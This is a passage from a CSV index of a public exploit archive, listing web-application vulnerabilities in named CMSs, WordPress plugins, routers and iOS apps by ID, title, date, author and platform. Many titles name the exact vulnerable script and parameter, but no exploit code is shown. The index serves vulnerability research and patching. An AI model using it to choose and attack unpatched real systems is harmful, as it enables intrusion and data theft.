'/pfile/kommentar.php?filecat' Cross-Site Scripting",2012-02-13,indoushka,php,webapps, -36766,exploits/php/webapps/36766.txt,"Powie pFile 1.02 - '/pfile/file.php?id' SQL Injection",2012-02-13,indoushka,php,webapps, -36768,exploits/php/webapps/36768.txt,"ProWiki - 'id' Cross-Site Scripting",2012-02-10,sonyy,php,webapps, -36769,exploits/php/webapps/36769.txt,"STHS v2 Web Portal - 'prospects.php?team' SQL Injection",2012-02-13,"Liyan Oz",php,webapps, -36770,exploits/php/webapps/36770.txt,"STHS v2 Web Portal - 'prospect.php?team' SQL Injection",2012-02-13,"Liyan Oz",php,webapps, -36771,exploits/php/webapps/36771.txt,"STHS v2 Web Portal - 'team.php?team' SQL Injection",2012-02-13,"Liyan Oz",php,webapps, -36772,exploits/cgi/webapps/36772.txt,"EditWrxLite CMS - 'wrx.cgi' Remote Command Execution",2012-02-13,chippy1337,cgi,webapps, -36774,exploits/php/webapps/36774.txt,"WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)",2015-04-15,"Necmettin COSKUN",php,webapps, -36807,exploits/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 -36777,exploits/php/webapps/36777.txt,"WordPress Plugin Ajax Store Locator 1.2 - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 -36784,exploits/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps, -36785,exploits/php/webapps/36785.txt,"11in1 CMS 1.2.1 - '/admin/index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps, -36786,exploits/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Cross-Site Request Forgery (Admin Password)",2012-02-15,"High-Tech Bridge SA",php,webapps, -36787,exploits/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps, -36790,exploits/php/webapps/36790.txt,"Tube Ace - 'q' Cross-Site Scripting",2012-02-16,"Daniel Godoy",php,webapps, -36791,exploits/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injections",2012-02-16,tempe_mendoan,php,webapps, -36792,exploits/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Local File Inclusion",2012-02-17,"Ucha Gobejishvili",php,webapps, -36793,exploits/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Cross-Site Scripting",2012-02-17,sonyy,php,webapps, -36795,exploits/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - Local File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps, -36796,exploits/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - Local File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps, -36797,exploits/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - Local File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps, -36798,exploits/ios/webapps/36798.txt,"Photo Manager Pro 4.4.0 iOS - Code Execution",2015-04-21,Vulnerability-Lab,ios,webapps, -36800,exploits/php/webapps/36800.txt,"WordPress Plugin NEX-Forms < 3.0 - SQL Injection",2015-04-21,"Claudio Viviani",php,webapps, -36801,exploits/php/webapps/36801.txt,"WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (2)",2015-04-21,"dadou dz",php,webapps, -36802,exploits/php/webapps/36802.txt,"WordPress Plugin Tune Library 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps, -36804,exploits/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure",2015-04-21,"KnocKout inj3ct0r",php,webapps, -36805,exploits/php/webapps/36805.txt,"WordPress Plugin Community Events 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps, -36815,exploits/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 -36848,exploits/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Open Redirection",2012-02-18,sonyy,php,webapps, -36849,exploits/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'get.php?v' Arbitrary File Access",2012-02-20,"J. Greil",php,webapps, -36850,exploits/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'userlogdetail.php?idclient' SQL Injection",2012-02-20,"J. Greil",php,webapps, -36851,exploits/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps, -36852,exploits/php/webapps/36852.txt,"TestLink - Multiple SQL Injections",2012-02-20,"Juan M. Natal",php,webapps, -36818,exploits/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",php,webapps,80 -36821,exploits/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",php,webapps, -36823,exploits/php/webapps/36823.txt,"WordPress Plugin Ultimate Product Catalogue - Unauthenticated SQL Injection (1)",2015-04-23,"Felipe Molina",php,webapps, -36824,exploits/php/webapps/36824.txt,"WordPress Plugin Ultimate Product Catalogue - Unauthenticated SQL Injection (2)",2015-04-23,"Felipe Molina",php,webapps, -36830,exploits/php/webapps/36830.txt,"Impulsio CMS - 'id' SQL Injection",2012-02-16,sonyy,php,webapps, -36834,exploits/php/webapps/36834.txt,"Joomla! Component com_x-shop - 'idd' SQL Injection",2012-02-18,KedAns-Dz,php,webapps, -36835,exploits/php/webapps/36835.txt,"Joomla! Component com_xcomp - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps, -36844,exploits/php/webapps/36844.txt,"WordPress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps, -36842,exploits/php/webapps/36842.pl,"OTRS < 3.1.x / < 3.2.x / < 3.3.x - Persistent Cross-Site Scripting",2015-04-27,"Adam Ziaja",php,webapps, -36994,exploits/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 - 'DOC' Directory Traversal",2009-04-17,MustLive,cgi,webapps, -36853,exploits/php/webapps/36853.txt,"Dolphin 7.0.x - 'viewFriends.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,"Aung Khant",php,webapps, -36854,exploits/php/webapps/36854.txt,"Dolphin 7.0.x - 'explanation.php?explain' Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps, -36856,exploits/php/webapps/36856.txt,"Joomla! Component com_xvs - 'Controller' Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps, -36860,exploits/php/webapps/36860.txt,"WordPress Plugin TheCartPress 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80 -36861,exploits/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466 -36862,exploits/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80 -36863,exploits/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps, -36865,exploits/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,hardware,webapps, -36867,exploits/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps, -36870,exploits/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps, -36873,exploits/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps, -36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",php,webapps, -36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",php,webapps, -36876,exploits/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,php,webapps, -36878,exploits/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting",2012-02-23,"Corrado Liotta",php,webapps, -36882,exploits/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' SQL Injection",2012-02-26,"Red Security TEAM",php,webapps, -36883,exploits/php/webapps/36883.txt,"Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps, -36885,exploits/php/webapps/36885.txt,"Bontq - 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,php,webapps, -36886,exploits/php/webapps/36886.txt,"OSQA's CMS - Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps, -36888,exploits/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps, -36889,exploits/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps, -36890,exploits/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",php,webapps, -36891,exploits/php/webapps/36891.txt,"Dotclear 2.4.1.2 - '/admin/plugin.php?page' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",php,webapps, -36892,exploits/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 - 'main.php' Cross-Site Request Forgery",2012-02-29,"Green Hornet",php,webapps, -36893,exploits/php/webapps/36893.txt,"Fork CMS 3.x - '/private/en/locale/index?name' Cross-Site Scripting",2012-02-28,anonymous,php,webapps, -36894,exploits/php/webapps/36894.txt,"Fork CMS 3.x - '/backend/modules/error/actions/index.php?parse()' Multiple Error Display Cross-Site Scripting Vulnerabilities",2012-02-28,anonymous,php,webapps, -36895,exploits/php/webapps/36895.txt,"starCMS - 'q' URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps, -36897,exploits/php/webapps/36897.txt,"LastGuru ASP Guestbook - 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps, -36898,exploits/php/webapps/36898.txt,"Etano 1.20/1.22 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-05,"Aung Khant",php,webapps, -36899,exploits/php/webapps/36899.txt,"Etano 1.20/1.22 - 'photo_search.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-05,"Aung Khant",php,webapps, -36900,exploits/php/webapps/36900.txt,"Etano 1.20/1.22 - 'photo_view.php?return' Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps, -36914,exploits/php/webapps/36914.txt,"Fork CMS 3.2.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps, -36916,exploits/php/webapps/36916.txt,"Exponent CMS 2.0 - 'src' SQL Injection",2012-03-07,"Rob Miller",php,webapps, -36917,exploits/php/webapps/36917.txt,"OSClass 2.3.x - Directory Traversal / Arbitrary File Upload",2012-03-07,"Filippo Cavallarin",php,webapps, -36910,exploits/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Local File Inclusion",2012-03-05,"Aung Khant",php,webapps, -36911,exploits/php/webapps/36911.txt,"11in1 CMS 1.2.1 - 'admin/comments?topicID' SQL Injection",2012-03-05,"Chokri B.A",php,webapps, -36912,exploits/php/webapps/36912.txt,"11in1 CMS 1.2.1 - 'admin/tps?id' SQL Injection",2012-03-05,"Chokri B.A",php,webapps, -36913,exploits/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Blind SQL Injection",2012-03-05,"Colin Wong",php,webapps, -36904,exploits/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - Local File Inclusion",2015-05-04,Vulnerability-Lab,ios,webapps, -36973,exploits/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps, -36922,exploits/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps, -36907,exploits/php/webapps/36907.txt,"WordPress Plugin Ultimate Product Catalogue 3.1.2 - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / Arbitrary File Upload Vulnerabilities",2015-05-04,"Felipe Molina",php,webapps, -36965,exploits/php/webapps/36965.txt,"Omnistar Live - Cross-Site Scripting / SQL Injection",2012-03-13,sonyy,php,webapps, -36967,exploits/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps, -36968,exploits/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Local File Inclusion",2012-03-14,n0tch,php,webapps, -36970,exploits/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps, -36971,exploits/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,java,webapps, -36924,exploits/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps, -36925,exploits/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps, -36926,exploits/php/webapps/36926.txt,"LeKommerce - 'id' SQL Injection",2012-03-08,Mazt0r,php,webapps, -36927,exploits/php/webapps/36927.txt,"ToendaCMS 1.6.2 - '/setup/index.php?site' Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps, -36929,exploits/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps, -36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps, -36934,exploits/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - 'listing.aspx?searchText' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps, -36935,exploits/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx?guide' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps, -36936,exploits/asp/webapps/36936.txt,"SAP Business Objects InfoView System - '/webi/webi_modify.aspx?id' Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps, -36937,exploits/php/webapps/36937.html,"PHPMyVisites 2.4 - 'PHPmv2/index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps, -36938,exploits/php/webapps/36938.txt,"Singapore 0.10.1 - 'gallery' Cross-Site Scripting",2012-03-11,T0xic,php,webapps, -36939,exploits/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Cross-Site Scripting",2012-03-11,MustLive,java,webapps, -36940,exploits/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 -36941,exploits/xml/webapps/36941.txt,"IBM Websphere Portal - Persistent Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps, -36942,exploits/php/webapps/36942.txt,"WordPress Plugin Freshmail 1.5.8 - 'shortcode.php' SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 -36943,exploits/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps, -36944,exploits/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",php,webapps, -36946,exploits/php/webapps/36946.txt,"Wikidforum 2.10 - Advanced Search Multiple Field SQL Injections",2012-03-12,"Stefan Schurtz",php,webapps, -36947,exploits/php/webapps/36947.txt,"Wikidforum 2.10 - Search Field Cross-Site Scripting",2012-03-12,"Stefan Schurtz",php,webapps, -36948,exploits/php/webapps/36948.txt,"Wikidforum 2.10 - Advanced Search Multiple Cross-Site Scripting Vulnerabilities",2012-03-12,"Stefan Schurtz",php,webapps, -36949,exploits/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272 -36950,exploits/php/webapps/36950.txt,"Syncrify Server 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5800 -36951,exploits/php/webapps/36951.txt,"SynaMan 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps, -36952,exploits/php/webapps/36952.txt,"WordPress Plugin N-Media Website Contact Form with File Upload 1.5 - Local File Inclusion",2015-05-08,T3N38R15,php,webapps, -36953,exploits/php/webapps/36953.txt,"SynTail 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps, -36954,exploits/php/webapps/36954.txt,"WordPress Plugin Yet Another Related Posts 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80 -36958,exploits/php/webapps/36958.txt,"WordPress Plugin Ultimate Profile Builder 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 -36959,exploits/php/webapps/36959.txt,"WordPress Plugin ClickBank Ads 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 -36960,exploits/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080 -36961,exploits/php/webapps/36961.txt,"WordPress Plugin Ad Inserter 1.5.2 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 -36963,exploits/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",linux,webapps, -36974,exploits/cgi/webapps/36974.txt,"WebGlimpse 2.14.1/2.18.8 - 'webglimpse.cgi' Remote Command Injection",2012-03-20,"Kevin Perry",cgi,webapps, -36975,exploits/php/webapps/36975.txt,"ClassifiedsGeek.com Vacation Packages - 'listing_search' SQL Injection",2012-03-19,r45c4l,php,webapps, -36976,exploits/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Full Path Disclosure",2012-03-18,Websecurity,cgi,webapps, -36977,exploits/php/webapps/36977.pl,"CreateVision CMS - 'id' SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps, -36978,exploits/hardware/webapps/36978.txt,"ZTE F660 - Remote Configuration Download",2015-05-11,"Daniel Cisa",hardware,webapps, -36979,exploits/php/webapps/36979.sh,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps, -37186,exploits/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps, -37006,exploits/java/webapps/37006.txt,"Minify 2.1.x - 'g' Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps, -36986,exploits/php/webapps/36986.txt,"Pluck CMS 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps, -36987,exploits/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - Parental Control Configuration Panel Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps, -36988,exploits/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - URL Filter Configuration Panel Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps, -36989,exploits/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injections",2015-05-11,"Filippo Roncari",php,webapps, -36990,exploits/php/webapps/36990.txt,"eFront 3.6.15 - Directory Traversal",2015-05-11,"Filippo Roncari",php,webapps, -36991,exploits/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection",2015-05-11,"Filippo Roncari",php,webapps, -36992,exploits/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - Cross-Site Request Forgery (Add User)",2015-05-11,hyp3rlinx,php,webapps, -36993,exploits/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,php,webapps, -36997,exploits/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps, -36999,exploits/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php?authors[][url]' Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps, -37000,exploits/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php?String::stripUnsafeHtml()' Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps, -37001,exploits/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps, -37002,exploits/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps, -37003,exploits/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps, -37004,exploits/php/webapps/37004.txt,"PHPCollab 2.5 - 'deletetopics.php' SQL Injection",2015-05-13,Wadeek,php,webapps, -37008,exploits/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Cross-Site Scripting",2012-03-24,3spi0n,php,webapps, -37009,exploits/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload",2012-03-23,voidloafer,java,webapps, -37010,exploits/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting",2012-03-25,Crim3R,php,webapps, -37011,exploits/php/webapps/37011.txt,"Geeklog 1.8.1 - 'index.php' SQL Injection",2012-03-27,HELLBOY,php,webapps, -37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,php,webapps, -37013,exploits/php/webapps/37013.txt,"NextBBS 0.6 - 'index.php?do' Cross-Site Scripting",2012-03-27,waraxe,php,webapps, -37015,exploits/asp/webapps/37015.txt,"Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps, -37016,exploits/php/webapps/37016.txt,"WordPress Plugin Integrator 1.32 - 'redirect_to' Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps, -37017,exploits/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Cross-Site Scripting",2012-03-28,sonyy,php,webapps, -37018,exploits/php/webapps/37018.txt,"MyBB 1.6.6 - 'index.php?conditions[usergroup][]' SQL Injection",2013-03-27,"Aditya Modha",php,webapps, -37019,exploits/php/webapps/37019.txt,"MyBB 1.6.6 - 'index.php?conditions[usergroup][]' Cross-Site Scripting",2013-03-27,"Aditya Modha",php,webapps, -37021,exploits/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 - 'json.php' Local File Inclusion",2012-03-28,"Canberk BOLAT",php,webapps, -37022,exploits/php/webapps/37022.txt,"ocPortal 7.1.5 - 'code_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2012-03-28,"High-Tech Bridge",php,webapps, -37023,exploits/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",php,webapps, -37024,exploits/php/webapps/37024.txt,"EZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting",2012-03-29,"Yann MICHARD",php,webapps, -37025,exploits/php/webapps/37025.txt,"PHP Designer 2007 Personal - Multiple SQL Injections",2012-03-30,MR.XpR,php,webapps, -37026,exploits/php/webapps/37026.txt,"e107 1.0 - 'view' SQL Injection",2012-03-30,Am!r,php,webapps, -37027,exploits/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Cross-Site Scripting",2012-03-29,Am!r,php,webapps, -37028,exploits/php/webapps/37028.txt,"JamWiki 1.1.5 - 'num' Cross-Site Scripting",2012-03-30,"Sooraj K.S",php,webapps, -37029,exploits/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 - '/fw/index2.do' Multiple Cross-Site Scripting Vulnerabilities",2012-04-01,"Vulnerability Research Laboratory",java,webapps, -37030,exploits/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/createAnomaly.do?subTab' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps, -37031,exploits/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/mindex.do?url' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps, -37032,exploits/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - 'fw/syslogViewer.do?port' Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps, -37033,exploits/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps, -37034,exploits/php/webapps/37034.txt,"FlatnuX CMS - Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps, -37035,exploits/php/webapps/37035.html,"FlatnuX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-01,"Vulnerability Laboratory",php,webapps, -37038,exploits/php/webapps/37038.txt,"osCMax 2.5 - '/admin/login.php?Username' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps, -37039,exploits/php/webapps/37039.txt,"osCMax 2.5 - '/admin/htaccess.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps, -37040,exploits/php/webapps/37040.txt,"osCMax 2.5 - '/admin/xsell.php?search' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps, -37041,exploits/php/webapps/37041.txt,"osCMax 2.5 - '/admin/stats_products_purchased.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps, -37042,exploits/php/webapps/37042.txt,"osCMax 2.5 - '/admin/stats_monthly_sales.php?status' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps, -37043,exploits/php/webapps/37043.txt,"osCMax 2.5 - '/admin/stats_customers.php?sorted' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps, -37044,exploits/php/webapps/37044.txt,"osCMax 2.5 - '/admin/information_manager.php?information_id' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps, -37045,exploits/php/webapps/37045.txt,"osCMax 2.5 - '/admin/geo_zones.php?zID' Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps, -37046,exploits/php/webapps/37046.txt,"osCMax 2.5 - '/admin/new_attributes_include.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-04,"High-Tech Bridge SA",php,webapps, -37047,exploits/php/webapps/37047.html,"osCMax 2.5 - '/admin/login.php?Username' SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps, -37048,exploits/php/webapps/37048.txt,"osCMax 2.5 - '/admin/stats_monthly_sales.php?status' SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps, -37050,exploits/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,Wadeek,php,webapps, -37054,exploits/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal",2015-05-18,pandujar,php,webapps, -37055,exploits/php/webapps/37055.txt,"Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 -37057,exploits/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - Local File Inclusion",2015-05-18,Vulnerability-Lab,ios,webapps,80 -37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080 -37059,exploits/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 - Cross-Site Request Forgery",2015-05-18,"Akash S. Chavan",windows,webapps, -37062,exploits/php/webapps/37062.txt,"vBulletin 4.1.10 - 'announcementid' SQL Injection",2012-04-04,Am!r,php,webapps, -37063,exploits/php/webapps/37063.txt,"WordPress Plugin TagGator - 'tagid' SQL Injection",2012-04-05,Am!r,php,webapps, -37067,exploits/php/webapps/37067.txt,"WordPress Plugin FeedWordPress 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 -37070,exploits/php/webapps/37070.txt,"WordPress Plugin Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps, -37071,exploits/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion / SQL Injection",2012-04-09,wacky,php,webapps, -37072,exploits/php/webapps/37072.txt,"Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections",2012-04-10,"Chokri B.A",php,webapps, -37073,exploits/php/webapps/37073.html,"BGS CMS 2.2.1 - 